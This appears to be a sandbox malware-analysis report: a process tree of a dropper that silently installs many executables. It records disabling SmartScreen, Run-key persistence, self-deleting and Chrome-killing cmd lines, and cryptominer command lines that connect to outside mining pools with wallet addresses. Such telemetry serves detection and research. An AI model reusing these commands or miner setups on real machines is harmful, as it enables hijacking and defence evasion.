jfiag3g_gg.exe PID 2924 wrote to memory of 4280 2924 WScript.exe rundll32.exe PID 2924 wrote to memory of 4280 2924 WScript.exe rundll32.exe PID 2924 wrote to memory of 4280 2924 WScript.exe rundll32.exe PID 4280 wrote to memory of 484 4280 rundll32.exe svchost.exe PID 4280 wrote to memory of 2724 4280 rundll32.exe svchost.exe PID 484 wrote to memory of 4372 484 svchost.exe svchost.exe PID 484 wrote to memory of 4372 484 svchost.exe svchost.exe PID 484 wrote to memory of 4372 484 svchost.exe svchost.exe PID 4092 wrote to memory of 4392 4092 22.exe WScript.exe PID 4092 wrote to memory of 4392 4092 22.exe WScript.exe PID 4092 wrote to memory of 4392 4092 22.exe WScript.exe PID 4280 wrote to memory of 60 4280 rundll32.exe svchost.exe PID 4280 wrote to memory of 2436 4280 rundll32.exe svchost.exe PID 4280 wrote to memory of 2392 4280 rundll32.exe svchost.exe PID 4280 wrote to memory of 1096 4280 rundll32.exe svchost.exe PID 4392 wrote to memory of 4692 4392 WScript.exe rundll32.exe PID 4392 wrote to memory of 4692 4392 WScript.exe rundll32.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
lilalmix.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSmartScreen = "0" lilalmix.exe -
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 5448 attrib.exe 7056 attrib.exe 9972 attrib.exe 4540 attrib.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\29DEA0BA258723098A514297F4C4D0B7.exe"C:\Users\Admin\AppData\Local\Temp\29DEA0BA258723098A514297F4C4D0B7.exe"1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 9483⤵
- Drops file in Windows directory
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 9243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 10803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 11323⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 11803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 10803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 8603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 14203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 14123⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-OTL2O.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-OTL2O.tmp\LabPicV3.tmp" /SL5="$10206,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-ME9A5.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-ME9A5.tmp\lylal220.tmp" /SL5="$10208,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"3⤵
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 5220 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 52205⤵
- Kills process with taskkill
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe"{path}"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe"{path}"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im loli.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im loli.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\GTQ6WGCUR6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GTQ6WGCUR6\multitimer.exe" 0 306065bb10421b26.04333812 0 1033⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\GTQ6WGCUR6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GTQ6WGCUR6\multitimer.exe" 1 3.1617574042.606a389a4f4e0 1034⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\GTQ6WGCUR6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GTQ6WGCUR6\multitimer.exe" 2 3.1617574042.606a389a4f4e05⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\2rjbwuqhgns\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\2rjbwuqhgns\cpyrix.exe" /VERYSILENT6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"8⤵
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"8⤵
-
C:\Users\Admin\AppData\Local\Temp\4is40zjc04k\lxsajuyiswe.exe"C:\Users\Admin\AppData\Local\Temp\4is40zjc04k\lxsajuyiswe.exe" /VERYSILENT6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5tasnj4liww\ufopblr5dc5.exe"C:\Users\Admin\AppData\Local\Temp\5tasnj4liww\ufopblr5dc5.exe" /ustwo INSTALL6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ufopblr5dc5.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\5tasnj4liww\ufopblr5dc5.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ufopblr5dc5.exe" /f8⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\om1qokg25qe\vpn.exe"C:\Users\Admin\AppData\Local\Temp\om1qokg25qe\vpn.exe" /silent /subid=4826⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ntxhjie4v5p\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\ntxhjie4v5p\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\hfjug0i0gin\m4wfftdygki.exe"C:\Users\Admin\AppData\Local\Temp\hfjug0i0gin\m4wfftdygki.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\hfjug0i0gin\m4wfftdygki.exe"7⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30008⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\xpjix4hi4kc\gfs0dd1ffhu.exe"C:\Users\Admin\AppData\Local\Temp\xpjix4hi4kc\gfs0dd1ffhu.exe" /quiet SILENT=1 AF=7566⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\xpjix4hi4kc\gfs0dd1ffhu.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\xpjix4hi4kc\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617314535 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"7⤵
-
C:\Users\Admin\AppData\Local\Temp\2l1cijfh324\app.exe"C:\Users\Admin\AppData\Local\Temp\2l1cijfh324\app.exe" /8-236⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2l1cijfh324\app.exe"C:\Users\Admin\AppData\Local\Temp\2l1cijfh324\app.exe" /8-237⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\u1k43i5dbkz\vict.exe"C:\Users\Admin\AppData\Local\Temp\u1k43i5dbkz\vict.exe" /VERYSILENT /id=5356⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\AU4TMKRUWS\setups.exe"C:\Users\Admin\AppData\Local\Temp\AU4TMKRUWS\setups.exe" ll3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\is-2TCLJ.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-2TCLJ.tmp\Microsoft.exe" /S /UID=lylal2201⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Internet Explorer\XAESQHIXTP\irecord.exe"C:\Program Files\Internet Explorer\XAESQHIXTP\irecord.exe" /VERYSILENT2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-QQFLQ.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-QQFLQ.tmp\irecord.tmp" /SL5="$10272,6265333,408064,C:\Program Files\Internet Explorer\XAESQHIXTP\irecord.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\f1-db822-e69-42fb4-5350606c49c27\ZHikoviralo.exe"C:\Users\Admin\AppData\Local\Temp\f1-db822-e69-42fb4-5350606c49c27\ZHikoviralo.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\2a-391ae-984-c4ca0-85014f466f53c\SHadisuxaejo.exe"C:\Users\Admin\AppData\Local\Temp\2a-391ae-984-c4ca0-85014f466f53c\SHadisuxaejo.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0iarwo0n.o3w\md6_6ydj.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\0iarwo0n.o3w\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\0iarwo0n.o3w\md6_6ydj.exe4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zxrf1pim.pgx\askinstall31.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\zxrf1pim.pgx\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\zxrf1pim.pgx\askinstall31.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j1o5izli.kx3\toolspab1.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\j1o5izli.kx3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\j1o5izli.kx3\toolspab1.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\j1o5izli.kx3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\j1o5izli.kx3\toolspab1.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bfdpo5rf.xdf\GcleanerWW.exe /mixone & exit3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tr1lagz3.3qx\setup_10.2_mix.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\tr1lagz3.3qx\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\tr1lagz3.3qx\setup_10.2_mix.exe4⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "5⤵
- Checks computer location settings
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lt3cdnm0.1wj\file.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\lt3cdnm0.1wj\file.exeC:\Users\Admin\AppData\Local\Temp\lt3cdnm0.1wj\file.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\KFSAU8ZEJY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KFSAU8ZEJY\multitimer.exe" 0 3060197d33d91c80.94013368 0 1016⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\KFSAU8ZEJY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KFSAU8ZEJY\multitimer.exe" 1 3.1617574194.606a393260461 1017⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\KFSAU8ZEJY\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KFSAU8ZEJY\multitimer.exe" 2 3.1617574194.606a3932604618⤵
- Checks for any installed AV software in registry
-
C:\Users\Admin\AppData\Local\Temp\purlmc34ojb\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\purlmc34ojb\cpyrix.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe10⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"11⤵
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe10⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"11⤵
-
C:\Users\Admin\AppData\Local\Temp\ui3ddfb0dfo\vict.exe"C:\Users\Admin\AppData\Local\Temp\ui3ddfb0dfo\vict.exe" /VERYSILENT /id=5359⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-MB8EO.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-MB8EO.tmp\vict.tmp" /SL5="$205B2,870426,780800,C:\Users\Admin\AppData\Local\Temp\ui3ddfb0dfo\vict.exe" /VERYSILENT /id=53510⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-MSFTF.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-MSFTF.tmp\win1host.exe" 53511⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\kndjoh3ujdw\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\kndjoh3ujdw\Setup3310.exe" /Verysilent /subid=5779⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-SES65.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-SES65.tmp\Setup3310.tmp" /SL5="$50596,138429,56832,C:\Users\Admin\AppData\Local\Temp\kndjoh3ujdw\Setup3310.exe" /Verysilent /subid=57710⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-DAFQT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-DAFQT.tmp\Setup.exe" /Verysilent11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\g4dqg3qxpel\brcy1tvm3gg.exe"C:\Users\Admin\AppData\Local\Temp\g4dqg3qxpel\brcy1tvm3gg.exe" /ustwo INSTALL9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "brcy1tvm3gg.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\g4dqg3qxpel\brcy1tvm3gg.exe" & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "brcy1tvm3gg.exe" /f11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\5szf4dsk25f\app.exe"C:\Users\Admin\AppData\Local\Temp\5szf4dsk25f\app.exe" /8-239⤵
-
C:\Users\Admin\AppData\Local\Temp\LV9Z2XD83X\setups.exe"C:\Users\Admin\AppData\Local\Temp\LV9Z2XD83X\setups.exe" ll6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-H3MTG.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-H3MTG.tmp\setups.tmp" /SL5="$70346,454998,229376,C:\Users\Admin\AppData\Local\Temp\LV9Z2XD83X\setups.exe" ll7⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"5⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Full Program Features.exe"5⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"6⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install7⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\F7DA.tmp.exe"C:\Users\Admin\AppData\Roaming\F7DA.tmp.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\F7DA.tmp.exe7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 38⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\F43F.tmp.exe"C:\Users\Admin\AppData\Roaming\F43F.tmp.exe"6⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w16149 --cpu-max-threads-hint 50 -r 99997⤵
- Blocklisted process makes network request
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w820@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999997⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"5⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0joycy0e.f5p\app.exe /8-2222 & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\0joycy0e.f5p\app.exeC:\Users\Admin\AppData\Local\Temp\0joycy0e.f5p\app.exe /8-22224⤵
-
C:\Users\Admin\AppData\Local\Temp\0joycy0e.f5p\app.exe"C:\Users\Admin\AppData\Local\Temp\0joycy0e.f5p\app.exe" /8-22225⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1nayrera.40e\Four.exe & exit3⤵
-
C:\Users\Admin\AppData\Local\Temp\1nayrera.40e\Four.exeC:\Users\Admin\AppData\Local\Temp\1nayrera.40e\Four.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\MM5G0A29PP\setups.exe"C:\Users\Admin\AppData\Local\Temp\MM5G0A29PP\setups.exe" ll5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-J47J0.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-J47J0.tmp\setups.tmp" /SL5="$2061A,454998,229376,C:\Users\Admin\AppData\Local\Temp\MM5G0A29PP\setups.exe" ll6⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\T0658PHXVX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T0658PHXVX\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1045⤵
-
C:\Users\Admin\AppData\Local\Temp\T0658PHXVX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T0658PHXVX\multitimer.exe" 1 3.1617574269.606a397dcebed 1046⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\T0658PHXVX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T0658PHXVX\multitimer.exe" 2 3.1617574269.606a397dcebed7⤵
